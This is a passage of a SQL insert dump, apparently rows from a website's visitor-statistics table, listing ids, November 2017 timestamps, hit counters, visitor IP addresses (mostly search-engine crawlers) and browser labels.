ther'),(174214,1509836381,1,1,0,0,'51.255.65.42','other'),(174215,1509836466,1,0,1,0,'66.249.76.109',''),(174216,1509836666,1,1,0,0,'207.46.13.163','other'),(174217,1509837167,1,1,0,0,'51.255.65.96','other'),(174218,1509838145,1,1,0,0,'137.74.207.164','other'),(174219,1509838457,1,1,0,0,'51.255.65.41','other'),(174220,1509838561,1,0,1,0,'66.249.66.75',''),(174221,1509838567,2,2,0,0,'164.132.162.155','other'),(174222,1509839332,1,1,0,0,'217.69.133.249','other'),(174223,1509839796,1,1,0,0,'137.74.207.119','other'),(174224,1509839987,1,1,0,0,'51.255.65.50','other'),(174225,1509840738,1,1,0,0,'176.31.231.10','other'),(174226,1509840946,1,1,0,0,'217.182.132.90','other'),(174227,1509841706,1,1,0,0,'180.76.15.17','other'),(174228,1509842381,1,1,0,0,'217.182.132.72','other'),(174229,1509842385,1,1,0,0,'217.182.132.78','other'),(174230,1509842494,1,1,0,0,'217.182.132.185','other'),(174231,1509842612,1,1,0,0,'217.69.133.69','other'),(174232,1509842763,1,1,0,0,'157.55.39.206','other'),(174233,1509842831,1,1,0,0,'217.182.132.51','other'),(174234,1509844575,1,1,0,0,'217.182.132.81','other'),(174235,1509844809,1,1,0,0,'51.255.65.26','other'),(174236,1509844876,1,1,0,0,'51.255.65.40','other'),(174237,1509845109,1,1,0,0,'5.9.60.241','other'),(174238,1509845164,1,1,0,0,'51.255.64.106','other'),(174239,1509845486,1,1,0,0,'8.29.198.26','other'),(174240,1509845651,1,1,0,0,'164.132.162.158','other'),(174241,1509846008,1,1,0,0,'141.8.142.74','other'),(174242,1509846289,1,1,0,0,'67.215.230.83','other'),(174243,1509846369,1,1,0,0,'217.182.132.240','other'),(174244,1509847231,1,1,0,0,'35.184.189.105','other'),(174245,1509847729,1,1,0,0,'217.182.132.157','other'),(174246,1509848396,1,1,0,0,'217.182.132.180','other'),(174247,1509849057,1,1,0,0,'217.182.132.27','other'),(174248,1509849149,1,1,0,0,'137.74.207.102','other'),(174249,1509849660,1,1,0,0,'137.74.207.159','other'),(174250,1509850684,1,1,0,0,'207.46.13.163','other'),(174251,1509850766,1,1,0,0,'217.182.132.78','other'),(174252,1509850771,1,0,1,0,'66.249.66.76',''),(174253,1509850834,1,1,0,0,'217.182.132.69','other'),(174254,1509850935,1,1,0,0,'217.69.136.205','other'),(174255,1509851327,1,1,0,0,'141.8.142.74','other'),(174256,1509851676,1,1,0,0,'212.22.197.111','chrome'),(174257,1509852276,1,1,0,0,'51.255.65.8','other'),(174258,1509852309,1,1,0,0,'51.255.65.13','other'),(174259,1509852371,1,1,0,0,'217.182.132.64','other'),(174260,1509852730,1,1,0,0,'51.255.65.35','other'),(174261,1509853028,1,1,0,0,'51.255.65.46','other'),(174262,1509853382,1,1,0,0,'51.255.65.52','other'),(174263,1509853385,1,1,0,0,'51.255.65.87','other'),(174264,1509853633,1,1,0,0,'35.184.189.105','other'),(174265,1509853926,1,1,0,0,'178.154.171.88','other'),(174266,1509853976,1,1,0,0,'51.255.65.80','other'),(174267,1509854192,1,1,0,0,'217.69.133.237','other'),(174268,1509854511,1,1,0,0,'137.74.207.109','other'),(174269,1509854518,1,1,0,0,'217.182.132.19','other'),(174270,1509854918,1,1,0,0,'217.182.132.57','other'),(174271,1509855477,1,0,1,0,'66.249.76.91',''),(174272,1509855594,1,1,0,0,'40.77.167.56','other'),(174273,1509855887,1,1,0,0,'217.182.132.180','other'),(174274,1509856181,1,1,0,0,'141.8.142.74','other'),(174275,1509856327,1,1,0,0,'8.29.198.26','other'),(174276,1509856346,2,2,0,0,'216.244.66.237','other'),(174277,1509857015,1,1,0,0,'217.69.133.231','other'),(174278,1509857673,1,1,0,0,'217.69.133.28','other'),(174279,1509857726,1,1,0,0,'217.69.133.244','other'),(174280,1509857824,6,6,0,0,'46.229.168.74','other'),(174281,1509857836,4,4,0,0,'46.229.168.73','other'),(174282,1509857853,2,2,0,0,'46.229.168.77','other'),(174283,1509857877,4,4,0,0,'46.229.168.78','other'),(174284,1509857884,3,3,0,0,'46.229.168.79','other'),(174285,1509857904,2,2,0,0,'46.229.168.69','other'),(174286,1509857924,6,6,0,0,'46.229.168.65','other'),(174287,1509857969,4,4,0,0,'46.229.168.66','other'),(174288,1509858009,5,5,0,0,'46.229.168.67','other'),(174289,1509858029,4,4,0,0,'46.229.168.76','other'),(174290,1509858067,1,1,0,0,'46.229.168.75','other'),(174291,1509858117,1,1,0,0,'141.8.142.50','other'),(174292,1509858118,4,4,0,0,'46.229.168.72','other'),(174293,1509858136,5,5,0,0,'46.229.168.68','other'),(174294,1509858195,4,4,0,0,'46.229.168.71','other'),(174295,1509858265,2,2,0,0,'46.229.168.80','other'),(174296,1509858367,1,1,0,0,'51.255.65.37','other'),(174297,1509858485,7,7,0,0,'46.229.168.70','other'),(174298,1509858593,1,1,0,0,'137.74.201.108','other'),(174299,1509858793,8,8,0,0,'46.229.168.79','other'),(174300,1509858813,5,5,0,0,'46.229.168.74','other'),(174301,1509858847,1,1,0,0,'51.255.65.33','other'),(174302,1509858848,3,3,0,0,'46.229.168.78','other'),(174303,1509858870,9,9,0,0,'46.229.168.66','other'),(174304,1509858902,5,5,0,0,'46.229.168.65','other'),(174305,1509858935,1,1,0,0,'46.229.168.67','other'),(174306,1509858972,3,3,0,0,'46.229.168.76','other'),(174307,1509859046,9,9,0,0,'46.229.168.73','other'),(174308,1509859193,6,6,0,0,'46.229.168.71','other'),(174309,1509859225,4,4,0,0,'46.229.168.80','other'),(174310,1509859271,3,3,0,0,'46.229.168.68','other'),(174311,1509859426,2,2,0,0,'46.229.168.70','other'),(174312,1509859512,1,0,1,0,'66.249.66.157',''),(174313,1509859574,3,3,0,0,'46.229.168.77','other'),(174314,1509859631,7,7,0,0,'46.229.168.69','other'),(174315,1509859699,3,3,0,0,'46.229.168.79','other'),(174316,1509859715,3,3,0,0,'46.229.168.72','other'),(174317,1509859840,4,4,0,0,'46.229.168.67','other'),(174318,1509859878,6,6,0,0,'46.229.168.76','other'),(174319,1509859918,4,4,0,0,'46.229.168.65','other'),(174320,1509860036,4,4,0,0,'46.229.168.73','other'),(174321,1509860114,4,4,0,0,'46.229.168.78','other'),(174322,1509860170,1,1,0,0,'51.255.65.10','other'),(174323,1509860173,16,16,0,0,'46.229.168.71','other'),(174324,1509860221,1,1,0,0,'51.255.71.122','other'),(174325,1509860239,5,5,0,0,'46.229.168.68','other'),(174326,1509860336,1,1,0,0,'164.132.162.164','other'),(174327,1509860526,7,7,0,0,'46.229.168.66','other'),(174328,1509860568,1,1,0,0,'51.255.71.133','other'),(174329,1509860604,3,3,0,0,'46.229.168.79','other'),(174330,1509860679,2,2,0,0,'46.229.168.77','other'),(174331,1509860715,6,6,0,0,'46.229.168.72','other'),(174332,1509860735,5,5,0,0,'46.229.168.75','other'),(174333,1509860767,3,3,0,0,'46.229.168.69','other'),(174334,1509860820,2,2,0,0,'46.229.168.65','other'),(174335,1509860855,6,6,0,0,'46.229.168.67','other'),(174336,1509860923,1,1,0,0,'164.132.162.187','other'),(174337,1509860982,1,1,0,0,'51.255.65.62','other'),(174338,1509861004,3,3,0,0,'46.229.168.74','other'),(174339,1509861016,3,3,0,0,'46.229.168.80','other'),(174340,1509861083,1,1,0,0,'51.255.65.16','other'),(174341,1509861104,5,5,0,0,'46.229.168.71','other'),(174342,1509861147,4,4,0,0,'46.229.168.70','other'),(174343,1509861162,7,7,0,0,'46.229.168.68','other'),(174344,1509861217,5,5,0,0,'46.229.168.73','other'),(174345,1509861245,1,1,0,0,'217.182.132.7','other'),(174346,1509861502,10,10,0,0,'46.229.168.78','other'),(174347,1509861650,4,4,0,0,'46.229.168.75','other'),(174348,1509861670,1,1,0,0,'217.69.133.249','other'),(174349,1509861686,3,3,0,0,'46.229.168.69','other'),(174350,1509861756,1,1,0,0,'164.132.162.164','other'),(174351,1509861852,4,4,0,0,'46.229.168.67','other'),(174352,1509861922,2,2,0,0,'46.229.168.79','other'),(174353,1509862033,5,5,0,0,'46.229.168.77','other'),(174354,1509862058,2,2,0,0,'46.229.168.74','other'),(174355,1509862079,2,2,0,0,'46.229.168.72','other'),(174356,1509862122,3,3,0,0,'46.229.168.80','other'),(174357,1509862145,6,6,0,0,'46.229.168.68','other'),(174358,1509862199,2,2,0,0,'46.229.168.65','other'),(174359,1509862256,2,2,0,0,'46.229.168.76','other'),(174360,1509862314,3,3,0,0,'46.229.168.73','other'),(174361,1509862360,3,3,0,0,'46.229.168.66','other'),(174362,1509862369,3,3,0,0,'46.229.168.71','other'),(174363,1509862397,1,1,0,0,'46.185.2.157','other'),(174364,1509862408,1,1,0,0,'46.229.168.78','other'),(174365,1509862932,1,1,0,0,'164.132.162.158','other'),(174366,1509863290,1,1,0,0,'217.182.132.14','other'),(174367,1509863499,1,1,0,0,'217.182.132.176','other'),(174368,1509863961,1,1,0,0,'51.255.65.74','other'),(174369,1509863979,1,0,1,0,'66.249.66.157',''),(174370,1509864324,1,1,0,0,'217.182.132.27','other'),(174371,1509864390,12,12,0,0,'142.4.200.37','other'),(174372,1509864796,1,1,0,0,'217.182.132.171','other'),(174373,1509864824,2,2,0,0,'91.196.178.40','chrome'),(174374,1509865582,1,1,0,0,'217.182.132.65','other'),(174375,1509865827,2,0,2,0,'66.249.76.108',''),(174376,1509865840,1,1,0,0,'217.182.132.176','other'),(174377,1509865910,1,0,1,0,'66.249.76.109',''),(174378,1509866414,1,1,0,0,'137.74.207.170','other'),(174379,1509866723,1,1,0,0,'51.255.65.69','other'),(174380,1509867158,1,1,0,0,'8.29.198.26','other'),(174381,1509867185,1,1,0,0,'51.255.71.114','other'),(174382,1509867213,1,1,0,0,'217.182.132.154','other'),(174383,1509867347,1,1,0,0,'217.182.132.96','other'),(174384,1509868249,1,1,0,0,'217.182.132.147','other'),(174385,1509868452,1,0,1,0,'66.249.76.108',''),(174386,1509868575,1,1,0,0,'51.255.65.39','other'),(174387,1509868754,1,1,0,0,'51.255.71.112','other'),(174388,1509868778,1,0,1,0,'66.249.76.91',''),(174389,1509869054,1,1,0,0,'217.182.132.52','other'),(174390,1509869065,1,1,0,0,'51.255.65.79','other'),(174391,1509869277,1,1,0,0,'216.244.66.237','other'),(174392,1509869565,1,1,0,0,'137.74.203.194','other'),(174393,1509870093,1,1,0,0,'157.55.39.225','other'),(174394,1509870354,1,1,0,0,'217.182.132.29','other'),(174395,1509870838,1,1,0,0,'217.182.132.146','other'),(174396,1509871032,1,0,1,0,'66.249.76.93',''),(174397,1509871551,1,1,0,0,'81.213.189.194','other'),(174398,1509871787,1,1,0,0,'217.182.132.87','other'),(174399,1509871869,1,1,0,0,'51.255.65.78','other'),(174400,1509872006,1,1,0,0,'217.182.132.81','other'),(174401,1509872039,1,0,1,0,'66.249.76.108',''),(174402,1509873489,1,1,0,0,'180.76.15.5','other'),(174403,1509873776,2,2,0,0,'88.198.55.175','other'),(174404,1509874003,5,5,0,0,'62.210.101.101','other'),(174405,1509874032,1,1,0,0,'5.45.207.30','other'),(174406,1509874116,1,1,0,0,'51.255.65.15','other'),(174407,1509874636,1,1,0,0,'51.255.65.72','other'),(174408,1509874965,1,1,0,0,'137.74.207.159','other'),(174409,1509875213,1,1,0,0,'51.255.65.94','other'),(174410,1509875411,1,1,0,0,'217.182.132.14','other'),(174411,1509875422,1,1,0,0,'217.182.132.53','other'),(174412,1509875623,1,1,0,0,'217.182.132.88','other'),(174413,1509875742,1,1,0,0,'66.249.76.107','chrome'),(174414,1509875936,1,1,0,0,'217.182.132.70','other'),(174415,1509875974,1,1,0,0,'51.255.71.123','other'),(174416,1509875993,1,1,0,0,'51.255.65.53','other'),(174417,1509876000,1,1,0,0,'35.184.189.105','other'),(174418,1509876363,1,1,0,0,'51.255.65.7','other'),(174419,1509877326,1,1,0,0,'66.249.76.109','chrome'),(174420,1509878000,1,1,0,0,'8.29.198.27','other'),(174421,1509878266,1,1,0,0,'51.255.65.94','other'),(174422,1509879258,1,1,0,0,'51.255.65.27','other'),(174423,1509879272,1,1,0,0,'217.69.133.193','other'),(174424,1509880187,1,1,0,0,'217.69.133.15','other'),(174425,1509880552,1,1,0,0,'217.182.132.93','other'),(174426,1509880896,1,1,0,0,'217.182.132.179','other'),(174427,1509881486,2,0,2,0,'66.249.66.156',''),(174428,1509881683,1,1,0,0,'51.255.65.21','other'),(174429,1509881800,1,1,0,0,'51.255.65.55','other'),(174430,1509881836,1,0,1,0,'66.249.76.109',''),(174431,1509882008,1,1,0,0,'217.182.132.174','other'),(174432,1509882011,1,1,0,0,'51.255.65.44','other'),(174433,1509882074,1,1,0,0,'51.255.65.84','other'),(174434,1509882458,1,0,1,0,'66.249.66.75',''),(174435,1509883132,1,1,0,0,'217.182.132.192','other'),(174436,1509883237,1,1,0,0,'217.182.132.173','other'),(174437,1509883708,1,1,0,0,'157.55.39.225','other'),(174438,1509883780,2,0,2,0,'66.249.66.157',''),(174439,1509883984,1,1,0,0,'217.182.132.50','other'),(174440,1509884772,1,1,0,0,'37.9.113.56','other'),(174441,1509885567,1,1,0,0,'137.74.207.116','other'),(174442,1509886073,1,1,0,0,'51.255.65.82','other'),(174443,1509886157,1,1,0,0,'217.182.132.179','other'),(174444,1509886304,1,0,1,0,'66.249.76.114',''),(174445,1509886315,1,1,0,0,'66.249.66.75','chrome'),(174446,1509887156,1,1,0,0,'217.182.132.29','other'),(174447,1509887598,1,1,0,0,'141.8.142.74','other'),(174448,1509887610,1,1,0,0,'217.182.132.150','other'),(174449,1509888142,1,1,0,0,'87.250.224.96','other'),(174450,1509888470,1,1,0,0,'37.9.113.186','other'),(174451,1509888841,1,1,0,0,'8.29.198.26','other'),(174452,1509889088,1,1,0,0,'51.255.71.110','other'),(174453,1509889162,1,0,1,0,'66.249.76.131',''),(174454,1509889428,1,1,0,0,'51.255.65.57','other'),(174455,1509889566,1,1,0,0,'51.255.65.36','other'),(174456,1509889788,1,1,0,0,'217.182.132.146','other'),(174457,1509889874,1,1,0,0,'217.182.132.96','other'),(174458,1509890436,1,1,0,0,'217.182.132.56','other'),(174459,1509890830,1,1,0,0,'217.182.132.64','other'),(174460,1509891379,1,1,0,0,'51.255.65.23','other'),(174461,1509891934,1,1,0,0,'217.182.132.184','other'),(174462,1509892195,1,1,0,0,'217.182.132.61','other'),(174463,1509892303,1,1,0,0,'51.255.65.30','other'),(174464,1509892679,1,1,0,0,'51.255.65.61','other'),(174465,1509892886,1,1,0,0,'217.182.132.146','other'),(174466,1509892962,1,1,0,0,'51.255.65.72','other'),(174467,1509893446,1,0,1,0,'66.249.76.137',''),(174468,1509893574,2,2,0,0,'137.74.207.159','other'),(174469,1509893636,1,1,0,0,'51.255.65.94','other'),(174470,1509893814,1,1,0,0,'217.69.133.237','other'),(174471,1509894209,1,1,0,0,'180.76.15.15','other'),(174472,1509894425,1,1,0,0,'51.255.65.11','other'),(174473,1509894524,1,1,0,0,'141.8.142.74','other'),(174474,1509894993,1,1,0,0,'93.74.212.147','firefox'),(174475,1509895055,1,1,0,0,'51.255.65.32','other'),(174476,1509895449,1,1,0,0,'5.45.207.83','other'),(174477,1509895719,1,1,0,0,'51.255.71.113','other'),(174478,1509896984,1,1,0,0,'217.182.132.181','other'),(174479,1509897044,1,1,0,0,'216.244.66.237','other'),(174480,1509897291,1,1,0,0,'141.8.142.74','other'),(174481,1509898373,1,1,0,0,'90.155.157.217','msie'),(174482,1509898462,1,1,0,0,'217.182.132.15','other'),(174483,1509898594,1,1,0,0,'51.255.65.32','other'),(174484,1509898595,1,1,0,0,'137.74.207.114','other'),(174485,1509898609,1,1,0,0,'51.255.71.122','other'),(174486,1509899358,1,1,0,0,'51.255.65.95','other'),(174487,1509899370,1,1,0,0,'137.74.207.161','other'),(174488,1509899681,1,1,0,0,'8.29.198.25','other'),(174489,1509900592,1,1,0,0,'66.249.76.131','chrome'),(174490,1509900691,1,1,0,0,'51.255.71.131','other'),(174491,1509900707,1,1,0,0,'217.182.132.57','other'),(174492,1509901218,1,1,0,0,'51.255.71.126','other'),(174493,1509901444,1,1,0,0,'178.154.200.8','other'),(174494,1509901820,1,1,0,0,'178.154.171.55','other'),(174495,1509902148,1,1,0,0,'141.8.142.126','other'),(174496,1509902602,1,1,0,0,'213.180.203.7','other'),(174497,1509902643,1,1,0,0,'51.255.65.87','other'),(174498,1509902827,1,1,0,0,'137.74.207.120','other'),(174499,1509903102,1,1,0,0,'37.9.113.115','other'),(174500,1509903114,1,1,0,0,'37.9.113.114','other'),(174501,1509903224,1,1,0,0,'46.200.247.220','chrome'),(174502,1509903288,1,1,0,0,'213.180.203.8','other'),(174503,1509903292,1,1,0,0,'178.154.200.7','other'),(174504,1509903358,1,1,0,0,'5.45.207.49','other'),(174505,1509903416,1,1,0,0,'35.184.189.105','other'),(174506,1509903688,1,1,0,0,'5.45.207.83','other'),(174507,1509903692,1,1,0,0,'37.9.113.63','other'),(174508,1509903695,1,1,0,0,'178.154.200.8','other'),(174509,1509903950,2,2,0,0,'87.250.224.66','other'),(174510,1509904165,1,1,0,0,'87.250.224.85','other'),(174511,1509904479,1,1,0,0,'37.9.113.82','other'),(174512,1509904528,2,2,0,0,'178.154.200.28','other'),(174513,1509904552,1,1,0,0,'37.9.113.110','other'),(174514,1509904555,1,1,0,0,'217.182.132.27','other'),(174515,1509904617,1,1,0,0,'141.8.132.22','other'),(174516,1509904784,1,1,0,0,'51.255.65.37','other'),(174517,1509904812,1,1,0,0,'217.182.132.181','other'),(174518,1509904963,1,1,0,0,'5.45.207.69','other'),(174519,1509904966,1,1,0,0,'87.250.224.39','other'),(174520,1509904975,1,1,0,0,'213.180.203.40','other'),(174521,1509905070,1,1,0,0,'217.182.132.193','other'),(174522,1509905190,1,1,0,0,'51.255.71.129','other'),(174523,1509905247,1,1,0,0,'5.189.183.71','other'),(174524,1509905473,1,1,0,0,'217.182.132.36','other'),(174525,1509905720,1,1,0,0,'5.45.207.58','other'),(174526,1509905899,1,1,0,0,'137.74.207.110','other'),(174527,1509906161,1,1,0,0,'137.74.207.102','other'),(174528,1509906217,1,1,0,0,'141.8.142.126','other'),(174529,1509906591,1,1,0,0,'51.255.65.9','other'),(174530,1509906746,1,1,0,0,'51.255.65.18','other'),(174531,1509907097,1,1,0,0,'51.255.65.72','other'),(174532,1509907331,1,1,0,0,'51.255.65.85','other'),(174533,1509907490,1,1,0,0,'217.182.132.54','other'),(174534,1509907957,1,1,0,0,'141.8.142.123','other'),(174535,1509908117,1,1,0,0,'180.76.15.31','other'),(174536,1509908302,1,1,0,0,'66.249.65.156','chrome'),(174537,1509908394,1,1,0,0,'178.154.171.60','other'),(174538,1509908445,1,1,0,0,'217.69.133.236','other'),(174539,1509908589,1,1,0,0,'51.255.65.95','other'),(174540,1509908843,1,1,0,0,'216.244.66.237','other'),(174541,1509908943,1,1,0,0,'217.182.132.150','other'),(174542,1509908977,1,1,0,0,'51.255.71.100','other'),(174543,1509908992,1,1,0,0,'51.255.65.23','other'),(174544,1509909228,1,1,0,0,'217.182.132.154','other'),(174545,1509909510,1,1,0,0,'217.182.132.149','other'),(174546,1509909703,1,1,0,0,'51.255.65.62','other'),(174547,1509909852,1,1,0,0,'213.180.203.8','other'),(174548,1509909894,1,0,1,0,'66.249.76.131',''),(174549,1509910033,1,1,0,0,'217.182.132.152','other'),(174550,1509910363,1,1,0,0,'137.74.207.108','other'),(174551,1509910484,1,1,0,0,'51.255.65.49','other'),(174552,1509910515,1,1,0,0,'8.29.198.27','other'),(174553,1509910698,1,1,0,0,'217.182.132.72','other'),(174554,1509910734,1,1,0,0,'217.182.132.14','other'),(174555,1509910759,1,1,0,0,'5.45.207.58','other'),(174556,1509911165,1,0,1,0,'66.249.76.131',''),(174557,1509911506,1,1,0,0,'51.255.65.32','other'),(174558,1509911744,1,1,0,0,'217.182.132.54','other'),(174559,1509911788,1,1,0,0,'108.59.8.70','other'),(174560,1509911878,1,1,0,0,'178.154.171.56','other'),(174561,1509911907,1,1,0,0,'95.108.181.102','other'),(174562,1509911911,1,1,0,0,'37.9.113.207','other'),(174563,1509911933,1,1,0,0,'178.154.200.32','other'),(174564,1509912273,1,1,0,0,'178.154.200.8','other'),(174565,1509912352,1,1,0,0,'217.182.132.22','other'),(174566,1509912519,1,1,0,0,'5.255.253.35','other'),(174567,1509912672,1,1,0,0,'137.74.201.100','other'),(174568,1509912961,1,1,0,0,'213.180.203.8','other'),(174569,1509913638,1,1,0,0,'178.154.171.10','other'),(174570,1509913693,1,1,0,0,'217.182.132.77','other'),(174571,1509913726,1,0,1,0,'66.249.65.156',''),(174572,1509913832,1,1,0,0,'217.182.132.68','other'),(174573,1509914149,1,1,0,0,'5.45.207.83','other'),(174574,1509914504,1,1,0,0,'51.255.71.122','other'),(174575,1509914711,1,1,0,0,'51.255.71.118','other'),(174576,1509914949,1,1,0,0,'51.255.65.28','other'),(174577,1509915195,1,1,0,0,'217.69.133.12','other'),(174578,1509915449,1,0,1,0,'66.249.65.157',''),(174579,1509915523,1,1,0,0,'217.182.132.155','other'),(174580,1509915965,1,1,0,0,'51.255.65.5','other'),(174581,1509916066,1,1,0,0,'217.182.132.90','other'),(174582,1509916100,1,1,0,0,'54.165.59.7','other'),(174583,1509916133,1,1,0,0,'37.9.113.115','other'),(174584,1509916782,1,1,0,0,'137.74.207.108','other'),(174585,1509916787,1,1,0,0,'217.182.132.190','other'),(174586,1509916855,1,1,0,0,'5.45.207.69','other'),(174587,1509917037,1,1,0,0,'37.9.113.182','other'),(174588,1509917105,1,1,0,0,'188.163.16.6','chrome'),(174589,1509917231,1,1,0,0,'213.180.203.40','other'),(174590,1509917436,1,1,0,0,'164.132.162.157','other'),(174591,1509917879,1,1,0,0,'66.102.9.35','chrome'),(174592,1509918115,1,1,0,0,'5.45.207.83','other'),(174593,1509918134,1,1,0,0,'66.249.65.123','chrome'),(174594,1509918139,1,0,1,0,'66.249.76.112',''),(174595,1509918482,1,1,0,0,'54.165.59.7','other'),(174596,1509918544,1,1,0,0,'51.255.65.87','other'),(174597,1509918917,1,1,0,0,'157.55.39.206','other'),(174598,1509919349,1,1,0,0,'95.108.181.111','other'),(174599,1509919353,1,1,0,0,'37.9.113.80','other'),(174600,1509919394,1,0,1,0,'66.249.65.156',''),(174601,1509919658,1,1,0,0,'51.255.65.67','other'),(174602,1509919695,1,1,0,0,'5.45.207.83','other'),(174603,1509919886,1,1,0,0,'37.9.113.132','other'),(174604,1509920005,1,1,0,0,'35.184.189.105','other'),(174605,1509920131,1,1,0,0,'178.154.200.8','other'),(174606,1509920233,2,2,0,0,'37.9.113.182','other'),(174607,1509920286,1,1,0,0,'51.255.65.45','other'),(174608,1509920667,1,1,0,0,'51.255.65.40','other'),(174609,1509920882,1,0,1,0,'66.249.65.155',''),(174610,1509921068,1,0,1,0,'66.249.76.113',''),(174611,1509921352,1,1,0,0,'8.29.198.25','other'),(174612,1509921765,1,1,0,0,'217.182.132.84','other'),(174613,1509922699,1,1,0,0,'51.255.64.106','other'),(174614,1509922907,1,0,1,0,'66.249.65.155',''),(174615,1509923083,1,1,0,0,'180.76.15.27','other'),(174616,1509923410,1,1,0,0,'216.244.66.237','other'),(174617,1509923560,1,1,0,0,'217.182.132.78','other'),(174618,1509924439,1,1,0,0,'51.255.65.70','other'),(174619,1509925182,1,1,0,0,'217.182.132.147','other'),(174620,1509925731,1,1,0,0,'51.255.65.69','other'),(174621,1509925913,1,1,0,0,'217.182.132.191','other'),(174622,1509926312,1,1,0,0,'217.182.132.52','other'),(174623,1509926526,1,1,0,0,'178.154.171.81','other'),(174624,1509926886,1,1,0,0,'37.9.113.134','other'),(174625,1509927292,1,1,0,0,'217.182.132.78','other'),(174626,1509928347,1,0,1,0,'66.249.76.131',''),(174627,1509928576,1,1,0,0,'217.182.132.20','other'),(174628,1509928671,1,1,0,0,'217.69.134.154','other'),(174629,1509928971,1,1,0,0,'66.249.76.112','chrome'),(174630,1509928976,1,0,1,0,'66.249.76.113',''),(174631,1509929128,1,1,0,0,'5.45.207.58','other'),(174632,1509929209,1,1,0,0,'180.76.15.31','other'),(174633,1509929283,1,1,0,0,'144.76.8.134','other'),(174634,1509931008,2,0,2,0,'66.249.65.156',''),(174635,1509931098,1,1,0,0,'157.55.39.225','other'),(174636,1509932115,1,1,0,0,'51.255.65.52','other'),(174637,1509932183,1,1,0,0,'8.29.198.27','other'),(174638,1509932422,1,1,0,0,'137.74.207.170','other'),(174639,1509932616,1,0,1,0,'66.249.76.137',''),(174640,1509933157,1,1,0,0,'217.182.132.151','other'),(174641,1509933226,1,1,0,0,'217.182.132.97','other'),(174642,1509933309,1,1,0,0,'95.108.181.102','other'),(174643,1509933881,1,1,0,0,'217.182.132.22','other'),(174644,1509934343,1,1,0,0,'35.184.189.105','other'),(174645,1509934383,1,1,0,0,'51.255.65.68','other'),(174646,1509934795,1,1,0,0,'37.9.113.115','other'),(174647,1509935068,1,1,0,0,'66.249.65.125','chrome'),(174648,1509935306,1,1,0,0,'51.255.71.114','other'),(174649,1509936344,1,1,0,0,'51.255.71.115','other'),(174650,1509936401,1,1,0,0,'51.255.65.18','other'),(174651,1509936614,1,1,0,0,'217.69.134.154','other'),(174652,1509936634,1,1,0,0,'217.182.132.65','other'),(174653,1509936734,1,0,1,0,'66.249.76.114',''),(174654,1509936747,1,1,0,0,'66.249.76.113','chrome'),(174655,1509936966,1,1,0,0,'178.154.171.81','other'),(174656,1509937116,1,1,0,0,'51.255.65.56','other'),(174657,1509937126,1,1,0,0,'37.115.188.137','chrome'),(174658,1509937291,1,1,0,0,'137.74.201.99','other'),(174659,1509937805,1,1,0,0,'40.77.167.23','other'),(174660,1509938691,1,1,0,0,'188.255.91.32','msie'),(174661,1509939401,1,1,0,0,'217.182.132.80','other'),(174662,1509939489,1,1,0,0,'164.132.162.155','other'),(174663,1509939520,1,1,0,0,'87.250.224.125','other'),(174664,1509939530,1,1,0,0,'217.182.132.96','other'),(174665,1509939566,1,1,0,0,'217.69.133.60','other'),(174666,1509939870,1,1,0,0,'164.132.164.180','other'),(174667,1509940521,1,1,0,0,'51.255.65.37','other'),(174668,1509940693,1,1,0,0,'217.182.132.15','other'),(174669,1509941053,1,1,0,0,'217.182.132.177','other'),(174670,1509941769,1,0,1,0,'66.249.65.157',''),(174671,1509941797,1,1,0,0,'51.255.65.2','other'),(174672,1509942222,1,1,0,0,'157.55.39.206','other'),(174673,1509942367,1,1,0,0,'217.182.132.25','other'),(174674,1509942755,1,1,0,0,'217.182.132.240','other'),(174675,1509942986,1,1,0,0,'217.182.132.23','other'),(174676,1509942999,1,1,0,0,'157.55.39.225','other'),(174677,1509943023,1,1,0,0,'8.29.198.27','other'),(174678,1509943054,1,1,0,0,'217.182.132.70','other'),(174679,1509943096,1,0,1,0,'66.249.76.137',''),(174680,1509943200,1,1,0,0,'51.255.71.114','other'),(174681,1509943238,1,1,0,0,'51.255.65.3','other'),(174682,1509943419,1,1,0,0,'217.182.132.87','other'),(174683,1509943657,1,0,1,0,'66.249.65.156',''),(174684,1509943860,1,1,0,0,'51.255.65.8','other'),(174685,1509944187,1,1,0,0,'217.69.133.67','other'),(174686,1509944315,1,1,0,0,'94.156.144.191','firefox'),(174687,1509944469,1,1,0,0,'109.63.231.0','msie'),(174688,1509944544,1,1,0,0,'217.182.132.90','other'),(174689,1509944982,1,1,0,0,'137.74.207.114','other'),(174690,1509945056,1,1,0,0,'217.182.132.80','other'),(174691,1509945171,1,1,0,0,'51.255.71.110','other'),(174692,1509945334,1,1,0,0,'51.255.65.93','other'),(174693,1509945522,1,1,0,0,'51.255.65.2','other'),(174694,1509945650,1,1,0,0,'217.182.132.153','other'),(174695,1509945684,1,1,0,0,'51.255.65.42','other'),(174696,1509946078,1,1,0,0,'66.45.243.194','other'),(174697,1509946418,1,1,0,0,'217.182.132.28','other'),(174698,1509946700,1,1,0,0,'141.8.132.22','other'),(174699,1509946834,1,1,0,0,'188.32.129.200','msie'),(174700,1509947409,1,1,0,0,'51.255.71.122','other'),(174701,1509947455,1,1,0,0,'51.255.65.47','other'),(174702,1509947607,1,1,0,0,'137.74.207.101','other'),(174703,1509947627,1,1,0,0,'66.102.9.25','chrome'),(174704,1509947686,1,1,0,0,'66.102.9.27','chrome'),(174705,1509947708,1,1,0,0,'46.219.238.25','chrome'),(174706,1509947734,1,1,0,0,'66.102.9.29','chrome'),(174707,1509947765,1,1,0,0,'217.182.132.15','other'),(174708,1509948679,1,1,0,0,'164.132.162.156','other'),(174709,1509948944,1,1,0,0,'164.132.162.188','other'),(174710,1509949047,1,1,0,0,'40.77.167.23','other'),(174711,1509949316,1,1,0,0,'217.182.132.87','other'),(174712,1509949551,1,1,0,0,'51.255.71.127','other'),(174713,1509949629,1,1,0,0,'66.249.65.157','chrome'),(174714,1509949893,1,1,0,0,'213.180.203.7','other'),(174715,1509950059,1,1,0,0,'51.255.65.90','other'),(174716,1509950173,1,1,0,0,'217.69.133.84','other'),(174717,1509950617,1,1,0,0,'51.255.65.84','other'),(174718,1509950955,1,1,0,0,'91.196.178.70','chrome'),(174719,1509951480,1,1,0,0,'91.196.178.165','chrome'),(174720,1509951624,1,1,0,0,'66.249.65.157','chrome'),(174721,1509951715,1,1,0,0,'51.255.65.15','other'),(174722,1509952129,1,1,0,0,'217.69.133.222','other'),(174723,1509952369,1,1,0,0,'217.182.132.173','other'),(174724,1509952403,1,1,0,0,'91.196.178.67','chrome'),(174725,1509952541,1,1,0,0,'217.182.132.171','other'),(174726,1509952675,1,1,0,0,'157.55.39.206','other'),(174727,1509952720,1,1,0,0,'217.182.132.76','other'),(174728,1509952977,1,1,0,0,'66.249.65.156','chrome'),(174729,1509953643,1,1,0,0,'91.196.178.70','firefox'),(174730,1509953725